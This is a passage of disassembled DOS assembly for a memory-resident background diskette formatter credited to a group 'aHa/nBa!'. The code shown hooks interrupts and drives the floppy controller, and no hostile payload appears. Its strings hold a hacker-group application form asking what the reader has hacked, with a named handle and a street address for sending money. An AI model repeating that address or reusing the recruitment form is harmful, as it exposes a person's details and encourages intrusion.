01h, 15h,0C4h,0BFh - db 01h, 1Bh, 20h,0BAh,0BAh, 01h - db 1Ch, 20h,0B3h - db ' Track display o' -data_187 dw 206Eh - db 20h, 20h,0B3h, 01h, 1Bh, 20h - db 0BAh,0BAh, 01h, 1Ch, 20h,0C0h - db 01h, 15h,0C4h,0D9h, 01h, 1Bh - db 20h,0BAh,0BAh, 01h, 1Ch, 20h - db 0DAh, 01h, 15h,0C4h,0BFh, 01h - db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch - db 20h,0B3h - db ' Release from memory ' - db 0B3h, 01h, 1Bh, 20h,0BAh,0BAh - db 01h, 1Ch, 20h,0C0h, 01h, 15h - db 0C4h,0D9h, 01h, 1Bh, 20h,0BAh - db 0BAh, 01h, 1Ch, 20h,0DAh, 01h - db 15h,0C4h,0BFh, 01h, 1Bh, 20h - db 0BAh,0BAh, 01h, 1Ch, 20h,0B3h - db 01h, 09h, 20h, 45h, 78h, 69h - db 74h, 01h, 08h, 20h,0B3h, 01h - db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch - db 20h,0C0h, 01h, 15h,0C4h,0D9h - db 01h, 1Bh, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0C8h, 01h, 4Eh - db 0CDh,0BCh, 01h, 87h,0D0h, 1Fh - db 0C9h, 01h, 4Eh,0CDh,0BBh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 13h, 20h,0ADh - db 'aHa/nBa!Mem Resident Format ' - db 1, 3 - db ' Version 6.9' - db 01h, 10h, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0CCh, 01h - db 4Eh - db 0CDh,0B9h,0BAh, 01h, 4Eh, 20h - db 0BAh,0BAh, 01h, 4Eh, 
20h,0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 4Eh, 20h - db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 4Eh, 20h - db 0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0CCh, 01h - db 17h - db 0CDh,0D1h, 01h, 0Fh,0CDh,0D1h - db 01h, 10h,0CDh,0D1h, 01h, 15h - db 0CDh,0B9h,0BAh, 01h - db 3 - db ' Drive To Be Format ' - db 0B3h, 01h, 03h - db ' Drive Type ' - db 0B3h - db ' Diskette No. ' - db 0B3h - db ' Total Diskette(s) ' - db 0BAh,0C7h, 01h, 17h,0C4h,0C5h - db 01h, 0Fh,0C4h,0C5h, 01h, 10h - db 0C4h,0C5h, 01h, 15h,0C4h,0B6h - db 0BAh, 01h, 0Bh - db 20h -data_188 db 41h - db 01h, 0Bh, 20h,0B3h, 01h, 05h - db 20h -data_189 db 31h - db 2Eh, 34h, 34h, 20h, 4Dh, 01h - db 04h, 20h,0B3h, 01h, 06h - db 20h -data_190 dw 3120h - db 01h, 08h, 20h,0B3h, 01h - db 09h, 20h -data_191 dw 3131h - db 1 - db 0Ah, 20h,0BAh,0C8h, 01h - db 17h,0CDh,0CFh, 01h, 0Fh,0CDh - db 0CFh, 01h, 10h,0CDh,0CFh, 01h - db 15h,0CDh,0BCh, 01h, 87h,0D0h - db 1Fh,0C9h, 01h, 4Eh,0CDh,0BBh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 13h - db ' Background Diskette Formatter S' - db 'tatus Report' - db 01h, 10h, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh - db 20h,0BAh,0CCh, 01h, 0Ch,0CDh - db 0D1h - db 01h, 15h,0CDh,0D1h, 01h, 11h - db 0CDh - db 0D1h, 01h, 19h,0CDh,0B9h,0BAh - db ' Diskette ' - db 0B3h, 01h, 07h, 20h, 56h, 6Fh - db 6Ch, 75h, 6Dh, 65h, 01h, 08h - db 20h,0B3h, 01h, 05h, 20h, 4Eh - db 6Fh, 2Eh, 20h, 4Fh, 66h, 01h - db 06h, 20h,0B3h, 01h, 04h - db ' Total Disk Space' - db 01h, 05h, 20h,0BAh,0BAh, 01h - db 05h, 20h, 4Eh, 6Fh, 2Eh, 01h - db 04h, 20h,0B3h, 01h, 04h - db ' Serial Number' - db 01h, 04h, 20h,0B3h - db ' Bad Cluster(s) ' - db 0B3h, 01h - db 8, ' In Bytes' - db 01h, 09h, 20h,0BAh,0C7h, 01h - db 0Ch,0C4h,0C5h, 01h, 15h,0C4h - db 0C5h, 01h, 11h,0C4h,0C5h, 01h - db 
19h,0C4h,0B6h - db 0BAh, 01h, 0Ch, 20h - db 0B3h, 01h, 15h - db 20h,0B3h, 01h, 11h, 20h,0B3h - db 01h, 19h, 20h,0BAh,0BAh, 01h - db 0Ch, 20h,0B3h, 01h, 15h, 20h - db 0B3h, 01h, 11h, 20h,0B3h, 01h - db 19h, 20h,0BAh,0BAh, 01h, 0Ch - db 20h,0B3h, 01h, 15h, 20h,0B3h - db 01h, 11h, 20h,0B3h, 01h, 19h - db 20h,0BAh,0BAh, 01h, 0Ch, 20h - db 0B3h, 01h, 15h, 20h,0B3h, 01h - db 11h - db 20h - db 0B3h, 01h, 19h, 20h,0BAh,0BAh - db 01h, 0Ch, 20h,0B3h, 01h, 15h - db 20h,0B3h, 01h, 11h, 20h,0B3h - db 01h, 19h, 20h,0BAh,0BAh, 01h - db 0Ch, 20h,0B3h, 01h, 15h, 20h - db 0B3h, 01h, 11h, 20h,0B3h, 01h - db 19h, 20h,0BAh,0BAh, 01h, 0Ch - db 20h,0B3h, 01h, 15h, 20h,0B3h - db 01h, 11h, 20h,0B3h, 01h, 19h - db 20h,0BAh,0BAh, 01h, 0Ch, 20h - db 0B3h, 01h, 15h, 20h,0B3h, 01h - db 11h, 20h,0B3h, 01h, 19h, 20h - db 0BAh,0BAh, 01h, 0Ch, 20h,0B3h - db 01h, 15h, 20h,0B3h, 01h, 11h - db 20h,0B3h, 01h, 19h, 20h,0BAh - db 0BAh, 01h, 0Ch, 20h,0B3h, 01h - db 15h, 20h,0B3h, 01h, 11h, 20h - db 0B3h, 01h, 19h, 20h,0BAh,0BAh - db 01h, 0Ch, 20h,0B3h, 01h, 15h - db 20h,0B3h, 01h, 11h, 20h,0B3h - db 01h, 19h, 20h,0BAh,0CCh, 01h - db 0Ch,0CDh,0CFh, 01h, 15h,0CDh - db 0CFh, 01h, 11h,0CDh,0CFh, 01h - db 19h,0CDh,0B9h,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 15h - db 20h, 50h - db 'ress Any Key To Return To Main M' - db 'enu' - db 01h, 15h, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0C8h, 01h, 4Eh - db 0CDh,0BCh, 01h, 87h,0D0h, 1Fh - db 0Dh, 0Ah, 0Dh, 0Ah, 20h - db 9 dup (20h) - db 0ADh - db 'aHa/nBa! Application Form! ' - db ' ', 0Dh - db 0Ah, 'What file is this?', 0Dh, 0Ah - db ' Where Did ' - db 'you get it from?', 0Dh, 0Ah, ' ' - db ' Handle:', 0Dh, 0Ah - db ' Phone #:', 0Dh, 0Ah, ' ' - db ' ', 0Dh, 0Ah, ' ' - db ' List 3 boards whe' - db 're you could be reached at: ', 0Dh - db 0Ah, 0Dh, 0Ah, ' ' - db ' Can y' - db 'ou HaCK?', 0Dh, 0Ah, ' ' - db ' List a fe' - db 'w thigs you', 27h, 've hacked:', 0Dh - db 0Ah, 0Dh, 0Ah, ' ' - db ' Ok! 
Send MoneY, pft,' - db ' and this letter to:', 0Dh, 0Ah, ' ' - db ' Psycho', 0Dh - db 0Ah, ' 1340 W Irving', 0Dh - db 0Ah, ' #229', 0Dh, 0Ah, ' ' - db ' Chicago, IL', 0Dh, 0Ah, ' 60' - db '613', 0Dh, 0Ah, ' ' - db ' Ok! No' - db 'w, write about yourself: ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ' - db ' ', 0Ch, 0 - db '.' - db 80h, 3Eh, 2Dh, 02h, 00h, 74h - db 08h, 2Eh,0FEh, 0Eh, 2Dh, 02h - db 0EBh, 09h, 90h - db 2Eh,0F6h, 06h, 2Eh, 02h, 80h - db 75h, 05h -loc_32: - jmp dword ptr cs:[195h] -loc_33: - mov word ptr cs:[1EAh],ax - mov al,0Bh - out 20h,al ; port 20h, 8259-1 int command - jmp short $+2 ; delay for I/O - in al,20h ; port 20h, 8259-1 int IRR/ISR - and al,0FEh - mov ax,word ptr cs:[1EAh] - jz loc_34 ; Jump if zero - jmp short loc_32 -loc_34: - mov word ptr cs:[1FCh],ax - mov word ptr cs:[1FEh],bx - mov word ptr cs:[208h],sp - mov word ptr cs:[20Eh],ss - mov word ptr cs:[20Ch],ds - mov word ptr cs:[210h],es - mov word ptr cs:[20Ah],bp - mov word ptr cs:[204h],si - mov word ptr cs:[206h],di - mov word ptr cs:[200h],cx - mov word ptr cs:[202h],dx - mov ds,word ptr cs:[1E2h] - mov ss,word ptr ds:[1DAh] - mov sp,word ptr ds:[1DCh] - mov es,word ptr ds:[1E4h] - mov bp,word ptr ds:[1E0h] - mov si,word ptr ds:[1D8h] - mov di,word ptr ds:[1DEh] - mov ax,word ptr ds:[1D0h] - mov bx,word ptr ds:[1D2h] - mov cx,word ptr ds:[1D4h] - mov dx,word ptr ds:[1D6h] - jmp dword ptr cs:[195h] - mov word ptr cs:[1F8h],ds - mov word ptr cs:[1F6h],ax - mov word ptr cs:[1FAh],bx - mov ds,cs:data_25 - mov bx,keybd_flags_1_ - mov ah,[bx] - and ah,0Fh - cmp ah,0Bh - jne loc_36 ; Jump if not equal - test byte ptr cs:[22Eh],0C0h - jz loc_35 ; Jump if zero - test 
byte ptr cs:[22Eh],40h ; '@' - jz loc_36 ; Jump if zero - or byte ptr cs:[22Eh],20h ; ' ' - jmp short loc_36 - db 90h -loc_35: - or byte ptr cs:[22Eh],80h -loc_36: - mov ax,word ptr cs:[1F6h] - mov ds,word ptr cs:[1F8h] - mov bx,word ptr cs:[1FAh] - jmp dword ptr cs:[199h] - db 2Eh, 80h, 3Eh, 2Fh, 02h, 00h - db 74h, 0Dh, 2Eh,0C6h, 06h, 2Fh - db 02h, 00h, 50h,0B0h, 66h,0E6h - db 20h, 58h,0CFh -loc_37: - jmp dword ptr cs:[19Dh] - test dl,80h - jnz loc_38 ; Jump if not zero - test byte ptr cs:[22Eh],40h ; '@' - jz loc_38 ; Jump if zero - mov word ptr cs:[1EAh],ax - pop ax - pop ax - pop ax - or ax,1 - push ax - sub sp,4 - mov ax,word ptr cs:[1EAh] - mov ah,80h - iret ; Interrupt return -sub_2 endp - - -; -; SUBROUTINE -; - -sub_6 proc near -loc_38: - jmp dword ptr cs:[1A1h] - mov byte ptr ds:[22Eh],40h ; '@' - call sub_28 - jnc loc_40 ; Jump if carry=0 - clc ; Clear carry flag -loc_39: - call sub_11 - jmp loc_121 -loc_40: - mov ds,data_25 - test byte ptr ds:dsk_motor_stat_,0Fh - push cs - pop ds - jnz loc_39 ; Jump if not zero - call sub_22 - call sub_23 -loc_41: - mov ax,55Ch - mov cs:data_93,ax - call sub_21 - mov data_112,70h ; 'p' - call sub_27 - call sub_13 -loc_42: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - je loc_48 ; Jump if equal - cmp al,0Dh - je loc_49 ; Jump if equal - cmp ah,48h ; 'H' - je loc_50 ; Jump if equal - cmp ah,50h ; 'P' - je loc_53 ; Jump if equal - and al,0DFh - cmp al,50h ; 'P' - je loc_43 ; Jump if equal - cmp al,52h ; 'R' - je loc_47 ; Jump if equal - cmp al,45h ; 'E' - je loc_48 ; Jump if equal - cmp al,53h ; 'S' - je loc_44 ; Jump if equal - cmp al,46h ; 'F' - je loc_45 ; Jump if equal - cmp al,54h ; 'T' - je loc_46 ; Jump if equal - call sub_11 - jmp short loc_42 -loc_43: - jmp loc_137 -loc_44: - jmp short loc_55 - db 90h -loc_45: - jmp loc_145 -loc_46: - jmp loc_149 -loc_47: - jmp loc_151 -loc_48: - jmp loc_154 -loc_49: - mov al,3 - mul data_107 ; ax = data * al - add ax,offset 
loc_43 - jmp ax ;*Register jump -loc_50: - mov data_112,1Fh - call sub_27 - cmp data_107,0 - je loc_52 ; Jump if equal - dec data_107 - sub data_110,3 -loc_51: - mov data_112,70h ; 'p' - call sub_27 - jmp short loc_42 -loc_52: - mov data_107,5 - mov data_110,15h - jmp short loc_51 -loc_53: - mov data_112,1Fh - call sub_27 - cmp data_107,5 - je loc_54 ; Jump if equal - inc data_107 - add data_110,3 - jmp short loc_51 -loc_54: - mov data_107,0 - mov data_110,6 - jmp short loc_51 -loc_55: - call sub_19 - mov data_190,3120h - cmp data_28,1 - jne loc_56 ; Jump if not equal - mov data_29,0 - jmp short loc_60 - db 90h -loc_56: - mov dh,0Dh - mov dl,18h - mov si,232h - call sub_14 - call sub_13 - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - jne loc_57 ; Jump if not equal - jmp loc_41 -loc_57: - cmp al,0Dh - je loc_60 ; Jump if equal - and al,0DFh - sub al,41h ; 'A' - jge loc_59 ; Jump if > or = -loc_58: - call sub_11 - jmp short loc_55 -loc_59: - cmp al,data_28 - jge loc_58 ; Jump if > or = - mov data_29,al - add al,41h ; 'A' - mov byte ptr ds:[24Eh],al ; ('A') - mov data_183,al - mov data_188,al -loc_60: - call sub_19 - call sub_37 - test byte ptr [bx],1 - jz loc_63 ; Jump if zero - mov dh,10h - mov dl,14h - test byte ptr [bx],2 - jnz loc_61 ; Jump if not zero - mov si,251h - jmp short loc_62 - db 90h -loc_61: - mov si,27Eh -loc_62: - call sub_14 - call sub_13 - mov al,31h ; '1' - mov data_102,al - mov al,[si-3] - mov data_103,al - mov data_89,1331h - call sub_16 - and byte ptr [si-3],0FEh - or [si-3],al - xor al,1 - xor data_31,ax -loc_63: - mov ax,data_31 - call sub_39 -loc_64: - call sub_20 - mov dh,0Bh - mov dl,14h - mov si,2ABh - call sub_14 - call sub_38 - cmp data_101,0 - je loc_69 ; Jump if equal - mov ax,word ptr ds:[137h] - mov bx,ax - cmp data_101,1 - jne loc_65 ; Jump if not equal - xchg bh,bl - xor bl,bl ; Zero register - sub al,30h ; '0' - jmp short loc_67 - db 90h -loc_65: - sub al,27h ; ''' - cmp al,0Ah 
- jg loc_64 ; Jump if > - jz loc_66 ; Jump if zero - xor al,al ; Zero register -loc_66: - sub ah,30h ; '0' - add al,ah - cmp al,0Bh - jg loc_64 ; Jump if > -loc_67: - cmp al,0 - je loc_64 ; Jump if equal - mov data_96,al - or bl,20h ; ' ' - cmp bl,30h ; '0' - jne loc_68 ; Jump if not equal - mov bl,20h ; ' ' -loc_68: - mov data_191,bx - mov data_182,bx -loc_69: - mov data_100,0F5h - mov data_95,0 - mov data_99,0 - call sub_20 - mov dh,0Ah - mov dl,18h - mov si,2DAh - call sub_14 - mov dh,0Ch - mov dl,13h - mov si,2FBh - call sub_14 - call sub_13 -loc_70: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,0Dh - je loc_72 ; Jump if equal - cmp al,1Bh - jne loc_71 ; Jump if not equal - jmp loc_41 -loc_71: - call sub_11 - jmp short loc_70 -loc_72: - mov data_82,1525h - cli ; Disable interrupts - pushf ; Push flags - push cs - mov ax,201h - mov bx,28E9h - mov cx,1 - mov dl,data_29 - xor dh,dh ; Zero register - call sub_6 - jnc loc_78 ; Jump if carry=0 - clc ; Clear carry flag - test ah,80h - jz loc_78 ; Jump if zero - call sub_11 - xor cx,cx ; Zero register - -locloop_73: - loop locloop_73 ; Loop if cx > 0 - - call sub_11 - call sub_56 - call sub_20 - mov dh,0Ah - mov dl,20h ; ' ' - mov si,3DAh - call sub_14 -loc_74: - mov dh,0Eh - mov dl,20h ; ' ' - mov si,40Fh - call sub_14 - call sub_13 -loc_75: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - je loc_77 ; Jump if equal - and al,0DFh - cmp al,52h ; 'R' - jne loc_76 ; Jump if not equal - jmp data_82 -loc_76: - cmp al,41h ; 'A' - je loc_77 ; Jump if equal - call sub_11 - jmp short loc_75 -loc_77: - jmp loc_135 -loc_78: - call sub_24 - call sub_61 - or byte ptr ds:[22Eh],80h - cli ; Disable interrupts - call sub_7 -loc_79: - call sub_52 - call sub_60 - mov data_82,1596h - call sub_64 - test data_73,0C0h - jz loc_80 ; Jump if zero - call sub_64 - test data_73,0C0h - jz loc_80 ; Jump if zero - jmp loc_123 -loc_80: - call sub_74 
- test data_73,0C0h - jz loc_81 ; Jump if zero - jmp short loc_83 - db 90h -loc_81: - cmp byte ptr ds:[230h],0 - je loc_82 ; Jump if equal - mov ax,word ptr ds:[243Dh] - cmp data_218,ax - jne loc_82 ; Jump if not equal - mov ax,word ptr ds:[243Fh] - cmp data_219,ax - jne loc_82 ; Jump if not equal - jmp loc_117 -loc_82: - cmp byte ptr data_214,0EBh - jne loc_83 ; Jump if not equal - cmp data_217,200h - jne loc_83 ; Jump if not equal - mov data_84,1626h - jmp short loc_84 - db 90h -loc_83: - mov data_84,1623h -loc_84: - call sub_77 - jnc loc_85 ; Jump if carry=0 - jmp loc_123 -loc_85: - test al,40h ; '@' - jz loc_87 ; Jump if zero -loc_86: - mov data_62,3 - jmp loc_125 -loc_87: - mov byte ptr ds:[230h],0 -loc_88: - mov data_82,161Fh -loc_89: - jmp data_84 - call sub_78 - mov data_68,28E9h - mov ax,word ptr data_60 - mov data_67,ax - mov data_69,42h ; 'B' - mov data_70,0E6h - mov data_85,27F1h - call sub_75 - test data_73,0C0h - jz loc_95 ; Jump if zero - test data_74,20h ; ' ' - jz loc_90 ; Jump if zero - cmp data_94,2 - je loc_93 ; Jump if equal - inc data_94 - jmp short loc_91 - db 90h -loc_90: - mov data_94,0 -loc_91: - call sub_65 - test data_73,0C0h - jz loc_92 ; Jump if zero - jmp loc_123 -loc_92: - mov data_84,1623h - jmp short loc_88 -loc_93: - mov data_94,0 - cmp data_65,0 - jne loc_94 ; Jump if not equal - jmp loc_105 -loc_94: - call sub_51 -loc_95: - cmp data_64,0 - jne loc_97 ; Jump if not equal - mov data_64,1 -loc_96: - jmp short loc_89 -loc_97: - call sub_9 - mov data_82,161Fh - mov data_64,0 - inc data_65 - inc data_63 - cmp data_31,0 - jne loc_98 ; Jump if not equal - inc data_63 -loc_98: - call sub_46 - cmp data_63,50h ; 'P' - jge loc_99 ; Jump if > or = - call sub_63 - test data_73,0C0h - jz loc_96 ; Jump if zero - call sub_65 - test data_73,0C0h - jz loc_96 ; Jump if zero - jmp short loc_100 - db 90h -loc_99: - mov data_65,0 - mov data_63,0 - mov data_66,1 - mov data_64,0 - mov data_59,0 - call sub_63 - test data_73,0C0h - jz loc_101 ; Jump if 
zero - call sub_65 - test data_73,0C0h - jz loc_101 ; Jump if zero -loc_100: - mov data_62,40h ; '@' - jmp loc_125 -loc_101: - mov data_82,1712h - call sub_78 - cmp data_64,1 - je loc_102 ; Jump if equal - mov data_64,1 - jmp short loc_101 -loc_102: - call sub_52 - mov ds,data_25 - mov ax,word ptr ds:timer_low_+1 - push cs - pop ds - mov word ptr ds:[243Dh],ax -loc_103: - mov data_82,1738h - mov data_64,0 - mov data_68,2416h - mov data_67,1FFh - mov data_69,4Ah ; 'J' - mov data_70,0C5h - mov data_85,27F1h - call sub_75 - test data_73,0C0h - jz loc_106 ; Jump if zero - test data_74,2 - jz loc_104 ; Jump if zero - jmp loc_86 -loc_104: - cmp data_94,0 - jne loc_105 ; Jump if not equal - inc data_94 - call sub_65 - test data_73,0C0h - jz loc_103 ; Jump if zero - jmp loc_123 -loc_105: - mov data_62,20h ; ' ' - jmp loc_125 -loc_106: - call sub_53 - mov byte ptr ds:[21Ah],2 - mov al,byte ptr ds:[242Bh] - mov data_214,al - mov data_215,0FFFFh - mov word ptr ds:[223h],0 - mov word ptr ds:[21Fh],0 - mov word ptr ds:[212h],139h -loc_107: - mov cx,80h - mov si,word ptr ds:[212h] -loc_108: - mov word ptr ds:[218h],cx - mov word ptr ds:[214h],si - call sub_55 - sub ax,word ptr ds:[21Fh] - test cx,[si] - jz loc_113 ; Jump if zero - cmp ax,200h - jl loc_109 ; Jump if < - mov word ptr ds:[21Bh],ax - call sub_49 - call sub_53 - call sub_50 - mov ax,word ptr ds:[21Bh] - sub ax,200h -loc_109: - mov di,offset data_214 - add di,ax - mov al,data_56 - cbw ; Convrt byte to word - cmp al,9 - jne loc_110 ; Jump if not equal - clc ; Clear carry flag - rcr ax,1 ; Rotate thru carry - adc ax,0 -loc_110: - mov cx,ax - mov si,word ptr ds:[229h] -loc_111: - mov bx,225h - mov ax,[bx+si] - mov bx,[di] - or ax,bx - cld ; Clear direction - stosw ; Store ax to es:[di] - xor si,2 - nop ;*ASM fixup - sign extn byte - jz loc_112 ; Jump if zero - dec di -loc_112: - dec cx - jnz loc_111 ; Jump if not zero - mov word ptr ds:[21Dh],di - jmp short loc_114 - db 90h -loc_113: - cmp ax,200h - jl loc_114 ; Jump if 
< - call sub_49 - call sub_53 - call sub_50 -loc_114: - mov word ptr ds:[21Bh],ax - mov al,data_56 - cbw ; Convrt byte to word - add word ptr ds:[223h],ax - mov ax,word ptr ds:[21Bh] - mov cx,word ptr ds:[218h] - mov si,word ptr ds:[214h] - shr cx,1 ; Shift w/zeros fill - jz loc_115 ; Jump if zero - jmp loc_108 -loc_115: - inc word ptr ds:[212h] - mov ax,word ptr ds:[212h] - cmp ax,word ptr ds:[216h] - je loc_116 ; Jump if equal - jmp loc_107 -loc_116: - call sub_49 - call sub_54 - mov di,data_100 - mov ax,word ptr ds:[243Fh] - xchg ah,al - cld ; Clear direction - stosw ; Store ax to es:[di] - mov ax,word ptr ds:[243Dh] - xchg ah,al - stosw ; Store ax to es:[di] - mov ax,word ptr data_98 - stosw ; Store ax to es:[di] - mov data_100,di - inc data_95 - inc data_99 - call sub_12 - mov al,data_96 - cmp data_95,al - je loc_119 ; Jump if equal -loc_117: - mov byte ptr ds:[230h],1 - mov ds,data_25 - mov byte ptr ds:dsk_motor_tmr_,2 - push cs - pop ds - mov data_92,3AAh - call sub_45 - mov cx,88h - -locloop_118: - call sub_7 - call sub_9 - mov cx,word ptr ds:[22Bh] - mov data_82,1596h - loop locloop_118 ; Loop if cx > 0 - - jmp loc_79 -loc_119: - mov data_92,3C2h - call sub_45 - mov data_107,2 - mov data_110,0Ch -loc_120: - mov data_81,130Dh - mov byte ptr ds:[230h],0 - call sub_8 -loc_121: - and byte ptr ds:[22Eh],0 - mov sp,2B84h - mov ax,202h - push ax - push cs - mov ax,data_81 - push ax - mov word ptr cs:[1DCh],sp -loc_122: - mov ss,word ptr ds:[20Eh] - mov sp,word ptr ds:[208h] - mov es,word ptr ds:[210h] - mov bp,word ptr ds:[20Ah] - mov si,word ptr ds:[204h] - mov di,word ptr ds:[206h] - mov ax,word ptr ds:[1FCh] - mov bx,word ptr ds:[1FEh] - mov cx,word ptr ds:[200h] - mov dx,word ptr ds:[202h] - mov ds,word ptr ds:[20Ch] - iret ; Interrupt return -loc_123: - mov byte ptr ds:[22Fh],0 - mov dx,3F2h - mov al,8 - out dx,al ; port 3F2h, dsk0 contrl output - cmp byte ptr ds:[230h],0 - je loc_124 ; Jump if equal - jmp loc_117 -loc_124: - mov data_62,80h -loc_125: - mov 
data_92,3B6h - call sub_45 - call sub_12 - mov byte ptr ds:[22Dh],6 - call sub_7 - call sub_12 - call sub_8 - mov data_81,195Dh - jmp short loc_121 -sub_6 endp - -loc_126: - and byte ptr cs:[22Eh],7Fh - call sub_28 - jnc loc_128 ; Jump if carry=0 - clc ; Clear carry flag - call sub_11 - test byte ptr ds:[22Eh],20h ; ' ' - jnz loc_127 ; Jump if not zero - jmp loc_121 -loc_127: - jmp loc_120 -loc_128: - call sub_22 - call sub_23 - call sub_56 - call sub_20 - cmp data_62,80h - je loc_129 ; Jump if equal - cmp data_62,3 - je loc_132 ; Jump if equal - cmp data_62,40h ; '@' - je loc_131 ; Jump if equal - cmp data_62,20h ; ' ' - je loc_130 ; Jump if equal - mov dh,0Ah - mov dl,1Eh - mov si,441h - call sub_14 - jmp short loc_133 - db 90h -loc_129: - mov dh,0Ah - mov dl,20h ; ' ' - mov si,3DAh - call sub_14 - jmp short loc_133 - db 90h -loc_130: - mov dh,0Ah - mov dl,18h - mov si,420h - call sub_14 - jmp short loc_133 - db 90h -loc_131: - mov dh,0Ah - mov dl,22h ; '"' - mov si,402h - call sub_14 - jmp short loc_133 - db 90h -loc_132: - mov dh,0Ah - mov dl,1Dh - mov si,3EBh - call sub_14 -loc_133: - mov dh,0Eh - mov dl,20h ; ' ' - mov data_62,0 - mov si,40Fh - call sub_14 - call sub_13 -loc_134: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - je loc_135 ; Jump if equal - and al,0DFh - cmp al,52h ; 'R' - je loc_136 ; Jump if equal - cmp al,41h ; 'A' - je loc_135 ; Jump if equal - call sub_11 - jmp short loc_134 -loc_135: - call sub_24 - mov data_107,0 - mov data_110,6 - jmp loc_120 -loc_136: - call sub_24 - cli ; Disable interrupts - mov byte ptr ds:[22Eh],0C0h - call sub_7 - call sub_65 - mov cx,5 - jmp data_82 -loc_137: - call sub_19 - mov dh,0Dh - mov dl,15h - mov si,457h - call sub_14 - call sub_13 -loc_138: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,1Bh - je loc_144 ; Jump if equal - cmp al,0Dh - je loc_139 ; Jump if equal - call sub_11 - jmp short loc_138 -loc_139: - 
call sub_19 - mov dh,0Dh - mov dl,21h ; '!' - mov si,47Fh - call sub_14 - call sub_13 - mov bp,0A2Bh -loc_140: - mov ah,2 - xor dx,dx ; Zero register - int 17h ; Printer dx=prn1, ah=func 02h - ; read status, ah=return status - test ah,10h - jz loc_143 ; Jump if zero - mov al,[bp] - cmp al,0 - je loc_144 ; Jump if equal - xor ah,ah ; Zero register - xor dx,dx ; Zero register - int 17h ; Printer dx=prn1, ah=func 00h - ; print char al, get status ah - test ah,29h ; ')' - jnz loc_141 ; Jump if not zero - inc bp - jmp short loc_140 -loc_141: - call sub_19 - mov dh,0Ch - mov dl,23h ; '#' - mov si,48Dh -loc_142: - call sub_14 - mov data_82,1A2Eh - jmp loc_74 -loc_143: - call sub_19 - mov dh,0Ch - mov dl,1Eh - mov si,499h - jmp short loc_142 -loc_144: - jmp loc_41 -loc_145: - cmp data_95,0 - jne loc_147 ; Jump if not equal - call sub_19 - mov dh,0Dh - mov dl,20h ; ' ' - mov si,38Dh - call sub_14 -loc_146: - mov dh,0Fh - mov dl,16h - mov si,368h - call sub_14 - call sub_13 - jmp short loc_148 - db 90h -loc_147: - mov ax,838h - mov cs:data_93,ax - call sub_21 - call sub_31 -loc_148: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - mov data_107,5 - mov data_110,15h - jmp loc_41 -loc_149: - cmp data_187,6666h - je loc_150 ; Jump if equal - mov data_187,6666h - jmp loc_41 -loc_150: - mov data_187,206Eh - jmp loc_41 -loc_151: - mov ax,11E0h - mov di,20h ; (' ') - call sub_30 - jc loc_152 ; Jump if carry Set - mov ax,12E6h - mov di,offset data_42 - call sub_30 - jc loc_152 ; Jump if carry Set - mov ax,12CCh - mov di,offset data_38 - call sub_30 - jc loc_152 ; Jump if carry Set - mov ax,127Ah - mov di,24h ; (' ') - call sub_30 - jnc loc_153 ; Jump if carry=0 -loc_152: - clc ; Clear carry flag - call sub_19 - mov dh,0Ch - mov dl,8 - mov si,327h - call sub_14 - jmp loc_146 -loc_153: - xor ax,ax ; Zero register - mov word ptr data_24,ax - mov si,offset 195h - mov di,20h ; (' ') - call sub_29 - mov si,offset 199h - mov di,24h ; (' ') - call 
sub_29 - mov si,offset 19Dh - mov di,offset data_38 - call sub_29 - mov si,offset 1A1h - mov di,offset data_42 - call sub_29 - mov es,data_26 - mov di,data_2e - xor ax,ax ; Zero register - stosw ; Store ax to es:[di] - mov es,data_27 - mov di,data_2e - xor ax,ax ; Zero register - stosw ; Store ax to es:[di] - push cs - pop es - call sub_24 - call sub_7 -loc_154: - mov data_107,0 - mov data_110,6 - call sub_24 - jmp loc_121 - -; -; SUBROUTINE -; - -sub_7 proc near - add byte ptr ds:[22Dh],1 - cli ; Disable interrupts - mov word ptr ds:[1D0h],ax - pop ax - pushf ; Push flags - push cs - push ax - mov word ptr ds:[1DCh],sp - mov word ptr ds:[1D2h],bx - mov word ptr ds:[1DAh],ss - mov word ptr ds:[1E2h],ds - mov word ptr ds:[1E4h],es - mov word ptr ds:[1E0h],bp - mov word ptr ds:[1D8h],si - mov word ptr ds:[1DEh],di - mov word ptr ds:[1D4h],cx - mov word ptr ds:[1D6h],dx - 